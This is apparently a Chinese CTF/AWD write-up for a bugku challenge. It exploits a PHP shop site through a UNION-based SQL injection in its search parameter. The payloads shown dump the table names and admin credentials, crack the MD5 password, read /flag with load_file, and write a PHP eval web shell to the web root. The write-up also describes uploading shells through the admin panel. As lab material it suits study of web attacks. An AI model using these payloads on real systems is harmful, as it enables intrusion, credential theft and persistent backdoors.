bugku AWD复现 S1-4

image-20230613185656897

搜索功能存在sql注入

//这里一开始其实用的是盲注(lll¬ω¬) 写脚本写习惯了

1
http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from information_schema.tables where table_schema=database()%23

pe_ad,pe_admin,pe_article,pe_ask,pe_cart,pe_category,pe_class,pe_collect,pe_comment,pe_link,pe_order,pe_orderdata,pe_page,pe_payway,pe_product,pe_setting,pe_user

1
http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from information_schema.columns where table_name='pe_admin'%23

admin_id,admin_name,admin_pw,admin_atime,admin_ltime

1
http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,concat_ws('-',admin_id,admin_name,admin_pw,admin_atime,admin_ltime),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from pe_admin%23

1-admin-7fef6171469e80d32c0559f88b377245-1269059337-1614397988

md5解密7fef6171469e80d32c0559f88b377245

得到admin888

查询读写权限@@global.secure_file_priv

1
http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,@@global.secure_file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

发现为空

image-20230613183143680

方法一

可以直接load_file(‘/flag’)

image-20230613183440838

方法二

也可以写马

1
http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,'<?php eval($_GET["shark"])?>',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 into outfile '/var/www/html/evil.php'%23

image-20230613183804624

方法三

根据前面的admin/admin888登录后台,在信息管理页面可以上传文件

image-20230613185806055

虽然上传之后提示

image-20230613185831443

但是实际上上传成功了

image-20230613185846247

图片地址即是木马地址

image-20230613185936865

广告列表也可以上传木马

image-20230613190303375